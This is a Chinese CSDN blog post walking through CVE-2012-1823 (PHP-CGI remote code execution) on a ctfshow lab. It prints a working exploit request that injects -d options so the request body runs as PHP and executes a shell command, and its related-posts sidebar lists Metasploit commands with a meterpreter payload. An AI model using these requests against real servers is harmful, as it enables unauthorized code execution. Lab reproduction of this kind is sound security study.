CVE-2012-1823

最新推荐文章于 2023-02-12 14:35:46 发布
最新推荐文章于 2023-02-12 14:35:46 发布
阅读量2.1k 收藏
点赞数 1
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53063436/article/details/122332649
版权

CVE-2012-1823详细介绍
漏洞复现(靶场为ctfshow)
利用

http://url/index.php?-s

判断是否存在漏洞
若出现源码组存在
bp抓包按下面修改

POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: example.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

<?php echo shell_exec("id"); ?>

发送后会出现id
在这里插入图片描述
表明利用成功

YunX1n
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip
01-19
CVE-2012-1675 补丁 oracle 11.2.0.1
CVE-2012-1823:phpcgi 代码执行
Foreverlove112的博客
11-08 1078
CVE-2012-1823:phpcgi 代码执行
CVE-2012-1823(PHP-CGI远程代码执行)
浅笑996的博客
11-20 4757
基于vulhub漏洞环境: 安装vulhub漏洞环境 https://mp.csdn.net/mdeditor/84102101# CGI模式下的参数: -c 指定php.ini文件的位置 -n 不要加载php.ini文件 -d 指定配置项 -b 启动fastcgi进程 -s 显示文件源码 -T 执行指定次该文件 -h和-? 显示帮助 1.启动漏洞环境 进入 CVE-20...
CVE-2012-1823 php-cgi漏洞 metasploit利用脚本
收集盒 Book box
07-11 1550
> use exploit/multi/http/php_cgi_arg_injection > set rhost IP > set PAYLOAD php/meterpreter/bind_tcp > exploit
CVE-2012-1823漏洞与嚣张的黑客
m0_65129142的博客
12-18 716
【1】初见端倪 某日,在我司技术人员的日常巡检过程中发现有一个客户现场的聚铭网络流量智能分析审计系统(iNFA)报出“疑似存在 CVE-2012-1823攻击尝试”的安全事件,于是立即要求相关技术人员抓取流量数据包,以便对本次疑似攻击事件进行分析和判定。 本文内容主要对该次攻击事件涉及的分析思路和相关技术进行分享,现场抓取的数据包内容如下图所示(敏感数据已进行脱敏处理)。 图1 攻击的相关数据 从数据的请求数据中可以发现几个可疑的点,应该重点关注和分析,或许能找到一些有用的线索。 URL部分: /?-
PHP-CGI远程代码执行漏洞(CVE-2012-1823)
鲨鱼辣椒的博客
06-09 1928
CGI是什么? CGI(Common Gateway Interface)公共网关接口,是web服务器运行时外部程序的规范,几乎所有的服务器都支持CGI,也可以用r
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835
06-20
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835, CVE-2011-0838, CVE-2011-0848, CVE-2011-0870, CVE-2011-0876, CVE-2011-0879, CVE-2011-0880, CVE-2011-2230, CVE-2011-2231, CVE-2011...
CVE-2012-0158的POC
04-18
这是office安全漏洞的一个POC,用来帮助分析理解漏洞原理。
Oracle Database Server 'TNS Listener'远程数据投毒漏洞(CVE-2012-1675)的完美解决方法
09-10
主要介绍了Oracle Database Server 'TNS Listener'远程数据投毒漏洞(CVE-2012-1675的完美解决方法的相关资料,本文介绍的非常详细,具有参考借鉴价值,需要的朋友可以参考下
CVE-2013-6117:CVE-2013-6117
04-29
CVE-2013-6117 $ ./CVE-2013-6117 -hOptions: -h, --help display help information -f, --filename File containing list of IP addresses -t, --target Target IP -n, --threads No of concurrent threads ...
[vulhub]:CVE-2012-1823 php-cgi远程代码执行
qq_43756450的博客
02-28 403
[vulhub]:CVE-2012-1823 php-cgi远程代码执行 Author:badbird Time:2020-2-6 该漏洞只出现在以cgi模式运行的php中。影响范围 < 5.3.12 < 5.4.2 0x01 预备知识 ​ 什么是CGI? ​ Common Gateway Interface 即“通用网关接口”。用于处理浏览器(客户端)向服务器发送的数据,在服务器上部署。CGI实际上是一种数据处理的协议,相当于Web服务器“背后的女人”。 ​ CGI做了什么工作?
Cve-2012-1823 PHP CGI Argument Injection Exploit
Yatere的天平秤
05-08 1390
原帖代码地址为: http://www.exploit-db.com/exploits/18836/ 由于其实为py2.x版本服务的,所以我将代码改为py3了。 代码如下: ###################################################################################### # Exploit Title: Cve
vulhub靶场php环境下的CVE-2012-1823(PHP-CGI远程代码执行漏洞)
m0_73248913的博客
02-12 387
msf解决vulhub
CVE-2012-1823漏洞复现
qq_46804551的博客
05-27 536
前言 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是指http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。 CGI即通用网关接口(Common Gateway Interface),它是一段程序, 通俗的讲CGI就象是一座桥,把网页和WEB服务器中的执行程序连接起来,它把HTML接收的指令传递给服务器的执行程序,再把服务器执行程序的结果返还给HTML页。 复现 在相应的漏洞环
CVE-2012-1823)PHP-CGI远程代码执行漏洞
weixin_45253622的博客
05-20 1191
漏洞原理 php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行。 php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互。 cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了
[Vulfocus解题系列] phpcgi 代码执行 (CVE-2012-1823)
00勇士王子的博客
07-09 530
漏洞介绍 名称: phpcgi 代码执行 (CVE-2012-1823) 描述: CGI全称是“通用网关接口”(Common Gateway Interface), 它可以让一个客户端,从网页浏览器向执行在Web服务器上的程序请求数据 这个漏洞简单来说,就是用户请求的querystring(querystring字面上的意思就是查询字符串,一般是对http请求所带的数据进行解析,这里也是只http请求中所带的数据)被作为了php-cgi的参数,最终导致了一系列结果。 解题过程 1.打开靶场环境 2.访问i
PHP-CGI远程代码执行漏洞 CVE-2012-1823 漏洞复现
ADummy的博客
02-25 865
PHP-CGI远程代码执行漏洞(CVE-2012-1823) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>代码执行 0x01漏洞介绍 ​ 首先,介绍一下PHP的运行模式。 下载PHP源码,可以看到其中有个目录叫sapi。sapi在PHP中的作用,类似于一个消息的“传递者”,比如我在《Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写》一文中介绍的fpm,他的作用就是接受Web容器通过fastcgi协议封装好的
a different vulnerability than CVE-2016-4589, CVE-2016-4623, and CVE-2016-4624.是什么意思?
最新发布
07-25
"a different vulnerability than CVE-2016-4589, CVE-2016-4623, and CVE-2016-4624" 的意思是指一个与 CVE-2016-4589、CVE-2016-4623 和 CVE-2016-4624 不同的漏洞。 CVE(Common Vulnerabilities and Exposures)是一种公共漏洞和暴露标识符的命名方案,用于唯一标识计算机系统中的已知漏洞。每个CVE标识符都与特定的漏洞相关联。 在这句话中,提到了 CVE-2016-4589、CVE-2016-4623 和 CVE-2016-4624 这三个漏洞标识符。通过使用 "a different vulnerability" 这个短语,可以推断出在讨论的上下文中,还存在另一个与这三个漏洞不同的漏洞。 具体而言,这句话表达了在给定的情况下,存在多个漏洞,其中一个与 CVE-2016-4589、CVE-2016-4623 和 CVE-2016-4624 不同,可能需要进一步的信息或上下文来了解这个不同的漏洞是指什么。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值